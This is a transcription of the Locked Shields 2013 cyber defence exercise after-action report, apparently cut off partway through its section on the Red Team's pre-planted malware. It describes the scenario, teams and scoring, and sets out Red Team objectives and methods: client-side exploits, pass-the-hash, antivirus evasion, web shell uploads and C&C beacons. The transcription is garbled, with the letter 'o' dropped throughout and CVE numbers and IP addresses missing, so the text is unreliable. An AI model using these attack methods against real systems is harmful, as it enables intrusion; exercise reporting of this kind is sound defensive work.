Cyber Defence Exercise Locked Shields After Action Report

Transcription

1 Cyber Defence Exercise Lcked Shields 2013 After Actin Reprt Tallinn 2013

2 1 Executive Summary This reprt describes the technical cyber defence exercise (CDX) named Lcked Shields 2013 (LS13). The intended target audience f the dcument cnsists f: the Blue Teams f LS13, t give them a detailed verview f the events and prvide feedback; parties wh cnduct similar exercises, t share ur experiences with the cmmunity; and the rganisers f the Lcked Shields, t identify lessns n hw t imprve future exercises. LS13 was a technical CDX executed n April Ten Blue Teams, cnsisting f up t 10 experts in IT and 1-2 legal advisrs, were the main training audience. They were acting as rapid reactin teams wh had t defend virtual netwrks against the Red Team's attacks, accmplish rders given by headquarters, fllw the lcal news and respnd t media inquiries, and analyse the legal aspects f their missin. The main bjective f LS13 was t test the skills f the Blue Team members, educate the legal experts n IT and pressure the lawyers with cmplex legal tasks. The scenari engaged the Blue Teams in a missin under UN mandate in a fictinal cuntry called Blea where the cnflict between the nrthern and suthern tribes had escalated t a level where the lcal gvernment was frced t request help frm the internatinal cmmunity. In additin t traditinal hstilities, cyber attacks began in April 2013 against the IT systems f lcal Aid rganisatins. Ten Blue Teams were requested t be deplyed in rder t prtect unclassified military netwrks and Aid rganisatins' netwrks. The Blue Teams were well prepared and were mre successful in preventing, detecting and mitigating the attacks than thse in previus Lcked Shields exercises. In the cntext f LS13, the fllwing areas were mst challenging fr the Blue Teams: Defending web applicatins. Detecting custm malicius cde. Mitigating BGP hijacking attacks. Initiating efficient infrmatin sharing. A Red Team cmpsed f ad-hc vlunteers is n lnger sufficient t prvide realistic challenges fr the Blue Teams. Mre permanent, better prepared and better c-perating teams are needed. Better tls are required t prvide feedback t the Blue Teams n the ffensive campaign. The technical platfrm fr LS13 was stable and perfrmed well. Building a Gamenet which includes mdern technlgies (e.g. mbile devices) and scenari specific cmpnents (e.g. military C&C systems) t reflect mre clsely the cmplexity f real wrld netwrks remains a challenge. LS13 was rganised in cperatin with the NATO Cperative Cyber Defence Centre f Excellence, the Estnian Infrmatin Systems Authrity, Estnian Defence Frces, the Estnian Cyber Defence League, Finnish Defence Frces and many ther partners.

3 2 Cntents 1 Executive Summary Cntents Overview f Lcked Shields Cncept Timeline Training Objectives Descriptin f the Teams Blue Teams and Legal Advisrs White Team Red Team Green Team Yellw Team Participants Scenari Scenari in a Nutshell General Backgrund Recent Develpments Technical Envirnment Cre Infrastructure Gamenet Scring Red Team Campaign Overview Red Team Objectives Tlset Client-Side Team Phase I Phase II Phase III Phase IV Custm Pre-Planted Cde... 21

4 4.5 WEB Team Phase I Phase II Phase III Phase IV Netwrk and Mixed Team Phase I Phase II Phase III Phase IV Pst-Explitatin Balance f the Attacks Cnclusins Blue Team Defence Campaign Intrductin Preparatins Cmmn Practices Blcking Access and RBL Less Cmmn Practices Questinable r Frbidden Practices Security Sftware n Windws Systems Infrmatin Sharing Scres Injects Scenari Injects Media Injects Legal Injects Legal Play Intrductin Injects Team Setup Feedback n Executin Results Recmmendatins t the Blue Teams

5 8.1 Prtecting Web Applicatins Prtecting ther Parts f the Infrastructure Reprting and Infrmatin Sharing Intrductin Yellw Team Feedback fr the Blue Teams Cnclusins Media Respnse Observatins and Recmmendatins t Imprve Lcked Shields Exercise Organisatin Scenari Teams White Team Red Team Green Team Legal Team Yellw Team Cmmunicatin Infrmatin Sharing and Cllabratin Situatinal Awareness Scring Technical Envirnment Cre Infrastructure Cllabratin, SA and Scring Platfrm Gamenet Rules Administrative Issues Acknwledgements Acrnyms

6 3 Overview f Lcked Shields 3.1 Cncept The key characteristics f LS13 were as fllws: It was a live, technical, Blue/Red Team exercise: Blue Teams had t defend netwrks against real-time attacks. It was internatinal: 18 rganisatins frm 15 natins were engaged int preparing and executing LS13. The type f the exercise was a game: the teams did nt represent the real rganisatins they are wrking fr during their daily jbs but were placed int fictinal rles. A lab envirnment was used instead f prductin netwrks. Over the curse f tw days the Blue Teams had t defend a pre-built netwrk cnsisting f rughly 35 virtual machines against the Red Team's attacks. The infrastructure was initially insecure and full f vulnerabilities. T prvide feedback t the teams and measure the success f different strategies and tactics, Blue Teams were assigned autmatic and manual scres. Each Blue Team was accmpanied by 1 r 2 legal advisrs t encurage and facilitate cperatin, cmmunicatin and understanding between the technical and legal experts. Red Team members were nt cmpeting with each ther. Their bjective was t cnduct equally balanced attacks n all the Blue Teams netwrks. LS13 was rganised by NATO CCD COE in cperatin with Estnian Defence Frces, the Estnian Infrmatin Systems' Authrity, the Estnian Cyber Defence League, Finnish Defence Frces, and many ther partners. 3.2 Timeline The timeline and main events list fr LS13 can be fund in the fllwing table. Date Event 22 Nv 2012 Initial Planning Cnference (IPC) 8-9 Jan 2013 Main Planning Cnference (MPC) 15 Mar 2013 Test Run 26 Mar 2013 Final Planning Cnference (FPC) 04 Apr :00Z (15:00 EEST) Webinar I: General Infrmatin. Strategies and tactics - lk int CDX 11 Apr :00Z (15:00 Webinar II: General Infrmatin. Reprting. Legal play EEST) Apr 2013 Preparatin Days: access fr Blue Teams t Gamenet 18 Apr :00Z (15:00 Webinar III: General Infrmatin. Scring. VSRm EEST) Apr 2013 Executin and Ht Wash-Up

7 5 Jul 2013 After Actin Reprt Review 3.3 Training Objectives The bjective was t test the skills f Blue Teams in the fllwing areas: 1. Learning the netwrk. Blue Teams were respnsible fr securing and maintaining systems previusly unknwn t them. They had t cmpile lists f assets and vulnerabilities, assign pririties t the assets, etc. 2. System administratin and preventin f attacks. Administrative tasks and hardening cnfiguratins were cntinuus activities. Day 0 vulnerabilities were simulated by nt allwing the teams t patch certain systems. 3. Mnitring netwrks, detecting and respnding t attacks. Gd mnitring skill was the key capability required t defeat the Red Team. 4. Handling cyber incidents. Priritisatin, reactin-time, and clarity f shared infrmatin were cnsidered when measuring this aspect. 5. Teamwrk: delegatin, dividing and assigning rles, leadership. The teams were verladed with tasks s that better rganised and managed teams wuld be mre successful. 6. Natinal and internatinal cperatin. Infrmatin sharing. 7. Reprting. Blue Teams were tasked t set up redundant links between their ruting infrastructures t fster cperatin between them. Cperative teams sharing valuable infrmatin were assigned bnus pints. Teams refusing t cperate were assigned a negative scre. Blue Teams were expected t cntinuusly prvide lightweight reprts t the White Team. The main aspects measuring their success were timeliness, crrectness, accuracy and clarity. 8. Ability t cnvey the big picture. Blue Teams were expected t cmpile management reprts and respnd t media requests. 9. Crisis cmmunicatin. The Media Simulatin Cell evaluated the speed, accuracy, lgic and reactin f Blue Teams' spkespeple when respnding t media requests. The legal play was set up s that there was at least ne legal advisr in each Blue Team. The training bjectives fr them were as fllws: 1. T have the legal advisrs analyse the cmplex legal issues arising in the cntext f an armed cnflict. 2. T facilitate cmmunicatin between the legal and technical experts. 3. T educate the legal experts abut IT. 4. T an extent, t educate the technical experts abut the law. 7

8 3.4 Descriptin f the Teams In this sectin we describe briefly the teams invlved in the LS exercises. Mre details can be fund at Annex I: Detailed Descriptin f the Teams Blue Teams and Legal Advisrs Blue Teams (BT) and the legal advisrs engaged with them are the main training audience f LS exercises. In LS13, Blue Teams represented military rapid reactin teams whse main task was t secure and prtect a pre-built infrastructure against the Red Team's attacks. There were tw main netwrk segments: an unclassified netwrk fr military units, and the netwrks running services fr Aid rganisatins deplyed in the cnflict area. Blue Teams were als expected t: a. cntinuusly send reprts t Headquarters t keep management infrmed abut incidents and ther events; b. respnd t media queries; c. accmplish additinal tasks sent frm the HQ. Legal advisrs had t brief ther members f the Blue Team abut their legal status, applicable law, rights and bligatins; and answer different questins n legal aspects raised by the HQ. There were als ut-f-the-game technical quizzes which the legal advisrs were suppsed t answer White Team The White Team (WT) had respnsibility fr preparing the exercise and cntrlling it during Executin. They defined the training bjectives, scenari, and high-level bjectives fr the Red Team, 8

9 wrte the rules, prepared media, scenari and legal injects and the cmmunicatin plan. During Executin, the White Team acted as the exercise cntrller's cell by deciding when t start different phases, cntrlling the executin f the Red Team's campaign, and making scring decisins. Management (HQ), user and media simulatin were als part f White Team's business. There was ne persn per Blue Team wh acted as a liaisn fficer Red Team The Red Team s (RT) missin was t cmprmise r degrade the perfrmance f the Blue Team systems. They had altgether 20 pre-defined bjectives. They were allwed t repeat sme bjectives during the next phases. The fcus f Lcked Shields exercises is t train the Blue Teams; therefre, Red Team members are mainly cnsidered as the wrk-frce t challenge the Blue Teams. In principle, the Red Team uses a white-bx apprach; technical details f the initial cnfiguratin f the Blue Team systems were available fr the Red Team befrehand Green Team The Green Team (GT) was respnsible fr preparing the technical infrastructure. GT had t carry ut the fllwing tasks: Design, set up and cnfigure the cre infrastructure: physical devices, virtualisatin platfrm, strage, netwrking, remte access, traffic recrding, VPN ruters fr the Blue Teams, user accunts, etc. Design and build the Gamenet and Blue Team netwrks. Prgram the autmatic scring bt and agents. Develp slutins fr traffic generatin. Set up slutins fr mnitring the general exercise infrastructure Yellw Team The Yellw Team's (YT) rle was t prvide situatinal awareness abut the game, mainly t the White Team but als t all ther participants. The main surces f data fr the Yellw Team were lightweight reprts prvided by the Blue Teams, reprts n the status f attack campaigns received frm Red Team members, and the results f autmatic and manual scring. The Yellw Team analyst had interfaces t review all the reprts and assign them tags based n the cntent f the reprt. Regular highlight updates were prvided t White Team leader and t the Blue Teams. Yellw Team als prepared different views and visualisatins f the situatin. 3.5 Participants Blue Teams frm the fllwing natins/rganisatins participated in LS13: DEU, ESP, EST, FIN, ITA, LTU, NATO NCIRC, NLD, POL, SVK. The White Team, Red Team, Green Team and Yellw Team were staffed with peple frm the NATO CCD COE, Estnian Defence Frces, the Estnian Infrmatin System's Authrity, the Estnian Cyber 9

10 Defence League, Finnish Defence Frces, the Swedish Natinal Defence Cllege, the NATO Cmputer Incident Respnse Capability-Technical Centre, the French Ministry f Defence, the Plish Ministry f Natinal Defence, CERT-LV, Lughbrugh University, Clarified Security, Clarified Netwrks, and ByteLife. 3.6 Scenari This sectin describes the backgrund scenari used fr LS Scenari in a Nutshell Lcatin: Blea, a failing state n an island ff the cast f Western Africa (think Smalia as an island). Cnflict: suthern tribes want t eliminate the nrthern tribes, gvernment unable t stp the fighting (think Rwanda). A UN-authrised internatinal calitin is in the cuntry with the cnsent f the Blean gvernment t stp ethnic cleansing and restre peace (think ISAF). The spring ffensive has fixed the calitin military frces in the suth. A chlera epidemic has started amng the nrthern tribes (think Haiti). Internatinal Aid rganisatins have few resurces in-cuntry, but are mbilising t deal with the epidemic. Aid rganisatins reprt cyber attacks against their systems in-cuntry and ask fr calitin assistance until crisis respnse teams fly in (ETA 2 days). BLUE: calitin military IT teams tasked t prvide and secure bth calitin unclassified systems and Aid rganisatins systems in-cuntry until Aid crisis respnse teams arrive. RED: lcal extremists (expected skill level lw t medium); pssible interventin frm internatinal terrrist rganisatin (expected skill level medium t high). Attacker's main gal is t impede the humanitarian relief peratin in the nrth and t bleed calitin resurces General Backgrund There is an internatinal calitin peratin in Blea, an island republic lcated ff the western cast f Africa, rughly 800 km nrth-west-west f Tenerife. While the size f the island is cmparable t Ireland, the climate and landscape are mre akin t Mrcc. The cuntry is pr and the lcal infrastructure is primitive, especially in terms f sanitatin, cmmunicatins, medical services and educatin. Internet cnnectivity with the rest f the wrld, fr example, is unreliable and lw-bandwidth. Cnnectivity within the cuntry is limited t urban centres, which make use f numerus free (and annymus) wireless netwrks. The cuntry has n CERT r IT-savvy law enfrcement. This frces mst internatinal actrs t rely either n expensive satellite cnnectivity r n lcally perated systems. Fr decades the Blean gvernment has been challenged fr pwer by a racist extremist mvement called Blea Is Tarnished (BIT). In 2011 BIT prceeded with a ruthless ethnic cleansing campaign against the tribes inhabiting the nrthern half f the island. In 2012 the internatinal cmmunity intervened with a UN-authrised peratin t stp the atrcities. While initially successful in securing nrthern areas, the calitin is still encuntering heavy resistance in the suth. Althugh there is n distinct frnt line, there are daily fire-fights, IED (imprvised explsive device) encunters, 10

11 suicide bmbings, kidnappings, etc. Mst f the vilence is targeted against internatinal humanitarian grups and civilians f the nrthern tribe. While generally a lcal affair, there are rumurs f weapns shipments and training prvided by an internatinal terrrist rganisatin. Accrding t intelligence analysts, this grup is interested in bleeding the resurces f the cmmitted states as part f a lng-term campaign t weaken EU and NATO. Such supprt enables the BIT t penly challenge the military might f the calitin, ften making use f unexpectedly cmplex tactics and technlgies Recent Develpments It is nw 24 April. One week ag the BIT started their spring ffensive. S far, they have managed t capture sme twns and villages in the suthern part f the cuntry. Calitin frces mved t take back the lst grund, but encuntered heavy resistance and are nw fully engaged in the suth. Three days ag, a chlera epidemic started spreading amng the civilian ppulatin in the nrth. The surce f the epidemic is prbably the water supply system. Sme BIT members were captured trying t pisn wells, s it may be smehw related t the spring ffensive. Due t pr hygiene and inadequate medical infrastructure in the cuntry, the epidemic is expected t spread if left unchecked. The gvernment immediately asked the internatinal cmmunity fr humanitarian assistance. UN and aid rganisatins that already perate in the cuntry reprt that their initial respnse capability is severely limited. Crisis respnse teams have been mbilised and are expected t arrive within a cuple f days. Calitin frces are still engaged and cannt spare significant manpwer t assist with the relief peratin. Aid rganisatins reprt that their lcal IT systems are under cyber attack. This makes it very hard t crdinate the relief effrt. Their systems are nt built with security in mind and they have n cyber security experts in-cuntry. The Aid rganisatins ask the calitin t prvide 10 IT supprt teams (cde name: Blue) wh culd assist in keeping the systems running at 10 different sites fr 2-3 days until crisis respnse teams frm the Aid rganisatins arrive. The calitin leadership agrees. Hwever, the Blue Teams must still maintain their wn systems, which prvide unclassified services (cmmunicating with the lcal gvernment and Aid rganisatins, as well as prviding welfare services) t calitin units. This means they have t perate systems in tw different sites with tw different plicies. This mrning the Blue teams deply t assist the Aid rganisatins. 3.7 Technical Envirnment Cre Infrastructure Designing and implementing an envirnment fr a technical cyber battlefield is nt a trivial task. The exercise lasts nly few days but during that perid the lads are high (mre than 400 virtual machines running simultaneusly) and Red Team is actually expected t break the systems. 11

12 LS13 infrastructure was hsted by the Estnian Defence Frces. All cmpnents f the Gamenet were virtualised. Participants gt access t the envirnment ver the VPN. This time a cmmercial slutin was chsen fr f several reasns. The main cmpnents were Cisc UCS platfrms and blade servers, EMC strage devices and VMware vsphere 5.0 virtualisatin platfrm. A detailed descriptin f the cre infrastructure is prvided in Annex II: Cre Infrastructure Gamenet Each Blue Team had t defend an identical netwrk cnsisting f 34 virtual machines (VMs): Cisc VSR 1000v virtual ruter. Endian Linux firewalls. Windws and Linux wrkstatins. Dmain cntrllers, file servers. DNS and mail servers. Linux and Windws servers fr hsting web applicatins and database servers. In additin, Blue Teams culd build 2 VMs themselves and integrate them int their netwrks. A detailed descriptin f the Gamenet and Blue Team systems can be fund at: Annex III: Gamenet. 3.8 Scring T measure the perfrmance f the Blue Teams and give them feedback, 8 categries fr the scres were defined: 1. Availability f prvided services Blue Teams had a list f required services which were cnstantly checked by the scring bt. Fr each service, a weight was defined which crrespnded t the scre ne culd get fr 100% availability f that service. 2. SLA bnus If the uptime f a service was within 90% (daily scre/8h), bnus pints were assigned fr that specific service. 3. Successful Red Team attack Every time the Red Team successfully accmplished an bjective, a pre-defined negative scre was assigned. Repeating the bjective gave half the negative pints the secnd time. 4. Lightweight incident reprting This was dne nce per hur. 5. Situatin reprts (SITREPs) t management Blue Teams had t cmpile 2 SITREPs per day, each f them were scred separately. 6. Respnding t injects (scenari, media, legal) All injects were separately scred based n pre-defined criteria. 7. VM reverts Each VM revert cst -100 pints. 8. Special scring 12

13 Bnus pints were awarded t Blue Teams fr utstanding perfrmance e.g. fr cperatin and inf sharing. Psitive pints were awarded t balance Green Team mistakes. Penalties were impsed fr breaking the in-game rules. Fr instance, remving functinality f services after a warning. If the warning was ineffective, the VM was reverted. The detailed scring table is nt published t avid Blue Teams pre-calculating winning strategies and fcusing n hw t defeat the scring system. The fllwing chart is an apprximatin f the weight f each categry. Nte that sme categries such as special scring d nt have an upper limit. 13

14 4 Red Team Campaign 4.1 Overview The ffensive peratin was divided int 4 phases. The timeframe fr each phase was pre-planned, but White Team had the final right t decide when t mve n with the campaign. Altgether 20 specific bjectives were defined. Red Team culd repeat the bjectives frm previus phases but the amunt f negative pints awarded t the Blue Teams decreased by half with every successful repetitin. After the STARTEX was annunced and Gamenet pened there was a 30-minute time windw when the Red Team was nt allwed t cmprmise any systems. Generating nise and scanning activities were permitted. At least ne Blue Team felt that this time windw was nt respected by all Red Team members, and that explitatin activities had in fact started earlier. 4.2 Red Team Objectives The Red Team bjectives are prvided in the fllwing table: nr descriptin zne intended target phase subteam 1 Deface with BIT message and pint t malware fr distractin. Media Team prpsal fr first rund: img1.jpg Media Team prpsal fr secnd rund: img2.jpg Aid_DMZ cunting.aidx.ex 1 WEB 2 Delete cntent, destry the hst as much pssible t keep BT busy in Aid_DMZ. I wuld nly steal at this phase and destry in next. Successful cmprmise can be prved by prviding the hash frm /etc/hash Aid_DMZ chat.aidx.ex 1 WEB 3 Change bank accunt numbers fr dnatins. File where the bank accunt details are written is /var/www/app/templates/dnate.t pl Aid_DMZ 1 WEB 4 Cmprmise and steal vlunteer database: database www and table vlunteers. It culd be stlen directly frm Aid_DMZ db.aidx.ex 1 WEB 14

15 nr descriptin zne intended target phase subteam db.aidx.ex r thrugh by gaining access t On the cde field each vlunteer has the same hash which has t be reprted t prve success. 5 Gain fthld in AID_INT. Steal C:\Users\Public\Dcuments\Rep rt1_aid.txt fr evidence. Prvide the MD5 hash inserted in the end f the file as a prf. AID_INT ws2.int.aidx.ex ws4.int.aidx.ex (ptinal) 1 CS 6 Spread inside AID_INT t ther hsts and set beacns. AID_INT dc.int.aidx.ex (ptinal) ws*.int.aidx.ex 1 CS 7 Cmprmise AID_INT fileserver. Steal Reprt5_aid.txt frm C:\Dcuments and Settings\All Users\Dcuments fr evidence. Prvide the MD5 hash inserted in the end f the file as a prf. AID_INT files.int.aidx.ex 1 CS 8 Insert malicius cde t MIL public website in rder t initiate water-hle attack and infect MIL_INT and MIL_WEL wrkstatins. MIL_DMZ 2 WEB 9 10 Cmprmise mail server in MIL_DMZ and steal specific s. Cmprmise mail server in Aid_DMZ and steal specific s. MIL_DMZ mail.milx.ex 2 WEB Aid_DMZ mail.aidx.ex 2 WEB 11 Gain fthld in MIL_INT, stay lw, set up beacn. MIL_INT ws2.int.milx.ex ws4.int.milx.ex (ptinal) ws5.int.milx.ex (ptinal) 2 CS 12 Cmprmise ne r mre wrkstatins n MIL_WEL. MIL_WEL ws1.wel.milx.ex (ptinal) 2 CS 15

16 nr descriptin zne intended target phase subteam Steal the reprt frm C:\Users\Public\Dcuments\Rep rt1_mil.txt. Prvide the MD5 hash inserted in the end f the file as a prf. ws2.wel.milx.ex 13 Insert fake rders in Aid persnnel tasking system leading them t ambush. Aid_DMZ help.aidx.ex 3 WEB 14 Gain and maintain access t the DNS servers. Steal hash frm /etc/hash as a prf. Aid_DMZ dns.aidx.ex 3 WEB 15 Re-gain fthld in MIL_INT thrugh any hst. MIL_INT ws2.int.milx.ex ws4.int.milx.ex (ptinal) 3 CS 16 Spread inside MIL_INT, set beacns. MIL_INT dc.int.milx.ex (ptinal) ws*.int.milx.ex 3 CS 17 Cmprmise MIL_INT fileserver. Steal reprt Reprt5_mil.txt frm C:\Dcuments and Settings\All Users\Dcument. Prvide the MD5 hash inserted in the end f the file as a prf. MIL_INT files.int.milx.ex 3 CS 18 Gain access, steal the hash frm /etc/hash as prf, maintain access. MIL_DMZ dns.milx.ex 3 WEB 19 Replace the vide feed n TV twer (via MIL_INT, MIL_WEL r directly). By default the fllwing file is streamed and therefre shuld be replaced: /var/www/stream/1.mp4 MIL_DMZ tv.milx.ex 4 CS 20 Cnduct ruting attack against MIL_DMZ. MIL_DMZ csr.milx.ex 4 NET 16

17 4.3 Tlset Fr LS exercises, Red Team members were allwed t bring in whatever tls they liked, prvided that the licensing cnditins were fllwed. Frm the cllabratin perspective it was imprtant that the tlset was at least t sme extent standardised. The fllwing lists main distributins and the mst imprtant sftware that was used t cnduct the attacks: Kali and BackTrack5 Linux. Cbalt Strike. Raphael Mudge, the develper f the sftware, spnsred the event and prvided LS13 Red Team an ptin t test it ut during the Executin. Metasplit Framewrk (free pen-surce versin f Metasplit). 4.4 Client-Side Team Client-Side (CS) Team was mainly respnsible fr attacking Windws and Linux wrkstatins using client-side explits and, after gaining fthld, trying t cmprmise the file servers and dmain cntrllers lcated in internal segments Phase I Objectives The general bjective fr the first phase was t fcus n targeting the Aid rganisatins internal zne (AID_INT). CS team was expected t fulfil the fllwing tasks: O5: Gain fthld in the AID_INT segment (wrkstatins). O6: Spread inside AID_INT t ther hsts and set beacns (dc.int.aidx.ex, ws*.int.aidx.ex). O7: Cmprmise a file server in AID_INT (files.int.aidx.ex) Targets The internal netwrks in bth MIL side and Aid side had 2 Windws XP VMs, 2 Windws 7 VMs and 1 Ubuntu Linux VM. Obviusly, this means the netwrks were extremely small cmpared t real-wrld situatins where large rganisatins have thusands f cmputers in a dmain. As the legitimate traffic generatin system typically did nt wrk, it made defence easier. Green Team tried t keep the perating systems up t date and remve nly specific patches. Same lcal administratr accunts were created n all Windws machines (ne vectr t enable Pass-the-Hash). The thirdparty sftware was ften utdated and cntained vulnerabilities. Typical suspects were Java, Adbe Flash, Internet Explrer. The file servers (files.int.aidx.ex, files.int.milx.ex) cntained vulnerabilities in bth required and nnrequired applicatins: FreeFlat FTP Server (OSVDB-88303), Oracle MySQL fr Micrsft Windws 17

18 (CVE ), Sielc Sistemi Winlg (CVE ), Sysax 5.53 SSH (OSVDB-79689). There were als typical issues like administrative user accunts with weak passwrds Attack Methds The methd f testing Blue Teams ability t cunter client-side attacks was simple. There was ne persn in White Team fr each Blue Team (called a blnde) whse task was t simulate the users f Blue systems. The blndes had t click n links t pen malicius web pages, dcuments r even executable files. As this prcess was nt autmatic the results fr different teams culd be cnsidered subjective. Naturally, mre active blndes culd cause mre harm. Opening the link triggered an attempt t explit vulnerabilities in sftware such as Java (CVE , CVE ), Adbe Flash Player (CVE ), Safari with Quicktime (CVE ), Internet Explrer (CVE ), and MS Office 2010 (CVE ). In sme cases Cbalt Strike's autexplit server was used t autmatically select the best explit. In general, this was nt needed as the targeting was easy fr Red Team members. They culd just request the blndes t pen the link r file with specific sftware. Typical paylads were Cbalt Strike Beacn and Metasplit Meterpreter. Red Team als acknwledged using DarkCmet RAT. The natural mve after gaining user-level access t Windws systems is t escalate privileges and dump the passwrd hashes. Althugh Pass-The-Hash (PTH) has been a well-knwn trick fr years, mitigating it is nt straightfrward and it very ften still wrks. PTH was tried by LS13 Red Team. CS team had in their pssessin a custm cde pre-planted int a few wrkstatins which is described in a separate sectin (Custm Pre-Planted Cde). At the end f the game Red Team als used insider attacks: VM that was cnnected int the internal netwrk simulating a cntractr's laptp Malware brught in and executed frm CD drive Results The first Cbalt Strike Beacns called hme a few minutes after 08:00Z - the time when the Red Team was allwed t start. The wrkstatins in the AID_INT zne f BT1, BT3, BT7, BT8 and BT10 cntacted the beacn servers during the first 20 minutes. Nte that, accrding t Cbalt Strike's activity lg, Red Team had Meterpreter sessins pen (these culd have been hung sessins) t wrkstatin in BT8 netwrk fr 4 minutes and BT7 fr 3 hurs during the first phase. Still, the first rund f the attack was reprted as a failure fr bth. The AID_INT wrkstatins fr all ther Blue Teams were nt cmprmised during phase I. It des nt necessarily mean that the ther teams did smething particularly clever. Often it was just nt pssible t access target systems. Main reasns fr this failure were: a. The wrkstatins were nt accessible t the blndes. b. The respective blnde was gne fr a lng time. c. After the first utbund request the target IP was blcked. d. Vulnerabilities were quickly patched r ther cuntermeasures applied s that the attempts failed. 18

19 e. Vulnerability was explitable but the Red Team was nt able t get t the shell. Fr instance, paylads were blcked by AV. The bjective t cmprmise a file server in AID_INT failed fr all the teams. The presumptin fr this attack was t have a fthld in the internal netwrk, but this was established in less than half the Blue Teams. In additin, infrmatin n the security issues f the file servers was shared between Blue Teams straight after the start f the game and all explitatin attempts failed. Gaining access using Pass-The-Hash wrked quite ften, but Red Team failed t explit it successfully as their Meterpreter paylads were detected and shell was nt btained Phase II Objectives During the secnd phase, the military netwrks als became targets. Red Team was als allwed t repeat the bjectives f the previus phase, but successful repetitin gave half the pints than it did the first time. New bjectives fr the CS were fllwing: O11: Gain fthld in MIL_INT segment, stay lw, and set up beacns (wrkstatins) O12: Cmprmise ne r mre wrkstatins in MIL_WEL Results When the secnd phase started, all Blue Teams had prtected their wrkstatins with security sftware. Sme teams had even tw different anti-virus prducts running. Mst f the Red Team members were nt prepared t use heavily custmised paylads in rder t evade IPS and AV. These security slutins d nt have any difficulties in detecting malicius executables generated by Metasplit Framewrk using the default templates. Therefre in mst cases explitatin f vulnerabilities in wrkstatins failed, dwnlads f executable files were blcked by firewalls r detected by AV/IPS, and a fthld was gained nly int the MIL_INT segments f BT1 and BT8. In the end f Day 1 members f the client-side team fund a way t kill MS Essentials under user privileges using a tl named Victr. This is ne f the reasns why BT1 and BT8 gt mre attentin and were cmprmised. In the case f ne McAfee installatin, RT claimed that a self-signed executable with a McAfee Inc string inside was sufficient t bypass it Phase III Objectives The aim f the third phase f the campaign was t achieve glbal reach targeting bth the Military s and the Aid rganisatins netwrks by repeating previusly defined bjectives and accmplishing the fllwing new nes: O15: Re-gain fthld in MIL_INT thrugh any hst (ws*.int.milx.ex). O16: Spread inside MIL_INT and set beacns (ws*.int.milx.ex, dc.int.milx.ex). O17: Cmprmise MIL_INT fileserver (files.int.milx.ex). 19

20 Results Frm the perspective f client-side attacks the situatin was similar t the previus day. Red Team members requested many new IPs fr all their attack servers and started t share links t the blndes. Typically, either the explits failed t run (vulnerabilities patched r detected by AV/IPS) r the IP addresses f the attackers were immediately blcked. Cmprmising the file server in MIL_INT failed fr all teams. In general, there were few exceptins: Windws 8 tablets in the MIL_WEL segment f BT1, BT2 and BT8 were hacked. Fthlds in MIL_INT were successfully regained fr BT1, BT4 and BT9 After lunch, nne f the Red Team members had a live Meterpreter sessin Phase IV Objectives In the final phase f the exercise, Red Team had t hack int the TV twer and replace the riginal vide feed with their wn. In reality tv.milx.ex was just a Linux system streaming a vide ver HTTP using VLC player. There were tw main attack vectrs: Backdred FTP server (vsfptd 2.3.4). Nte that Blue Teams were required t keep the FTP accessible nly frm MIL_WEL and MIL_INT althugh initially it was nt prperly firewalled. Vulnerable vide uplad service. The secnd gal f the CS team fr the final phase was t regain r maintain access t internal netwrks Results Red Team had under their cntrl ne VM inside each Blue Team's MIL_INT segment which was simulating a cntractr's laptp infected with malware. This was saved fr the last phase as the FTP service running n the TV twer cmputer was accessible nly frm internal segments. Unfrtunately fr the Red Team, the cntractr's laptp was cnfigured with similar static IP address (10.x.3.140) fr all Blue Teams. The rgue system was quickly discvered by BT8 and annunced t all the thers. Based n BT8 s bservatin it appears that instead f being quiet, Red Team started t prt scan internal netwrks, which naturally caused immediate detectin. Just befre the TV twer attack a grenade explded near the mbile cntainer where the hardware fr tv.milx.ex was lcated. This was an inject the purpse f which was t justify reverting the VMs. Blue Teams were tld that they had nly an ld backup s the machines were reverted t the initial vulnerable state and they lst all the changes. Red Team members upladed WSO Web Shell thrugh the vulnerable file uplad functinality and were able t change the streaming vide fr 6 teams. Typically, the cmprmise was quickly discvered (less than 5 minutes) and attackers kicked ff the server. The cmments fr the Blue Teams wh prevented this attack: BT2: tv.mil2.ex/uplads/ directry is nt writeable. BT3: tv.mil3.ex/uplads/ directry is nt writeable. 20

21 BT5: initial web shell uplad succeeded but it was immediately discvered and attacker's IP blcked. Later cmment: team5 have blcked vide uplad functinality n their website. BT6: IP gt blcked and nt able t access the service. The last attempts t get access t the internal wrkstatins were made at the very end f the exercise. All attempts t deliver the backdrs thrugh netwrk had failed, and s an ISO image was prepared with custm encded executables. This image was munted as a CD device t the wrkstatins and blndes were requested t pen the file n the disk. One Red Team member frm FRA was actually very skilled at AV evasin techniques but he was a new member and thers did nt knw early enugh abut his expertise. As the result, the executable was nt detected by many AV prducts and a call-back was received at least frm BT1, BT4, BT6 and BT8. The impact may have been limited because BT5 quickly infrmed thers abut INSIDER THREAT and media full f malware Custm Pre-Planted Cde Red Team had develped 2 pieces f cde t simulate unknwn malware: 1. Mre nisy and easier t eradicate. 2. Quiet and mre difficult t remve. The spreading and infectin mechanism was cmpletely missing. Cnsequently, bth backdrs had t be pre-planted int the Windws wrkstatins (ws1.int*, ws3.int*, ws1.wel*, ws2.wel*) befre Executin. Other functinality was als limited. It was nt pssible t get immediate cntrl ver the infected hst, but the Red Team culd use it t uplad and run new executables. The first piece was designed t wake at 11:00Z n Day 1 and then apprximately every 15 secnds cntact cmmand and cntrl (C&C) servers t get new tasks. C&C servers used dmain names like giving the Red Team the ptin t change the IP addresses int which thse names were reslved. The fllwing list cntains IP addresses f all wrkstatins that tried t cntact C&C infrastructure with this malware: BT1: , BT2: , BT3: , BT4: , , BT5: , BT6: , BT7: , , BT8: , BT9: , BT10: , , Nte that BT4, BT7 and BT10 have IP address f their firewall in the list, indicating that they used Netwrk Address Translatin (NAT). Fr all the Blue Teams except BT5, BT6 and BT7 this malware was still cntacting the C&C servers after the end f the Game. This assumptin is based n the http.lg generated with Suricata, which was run n the packet captures f all cllected traffic. Last requests frm thse teams were: BT5 at 12:18Z n Day 1 21

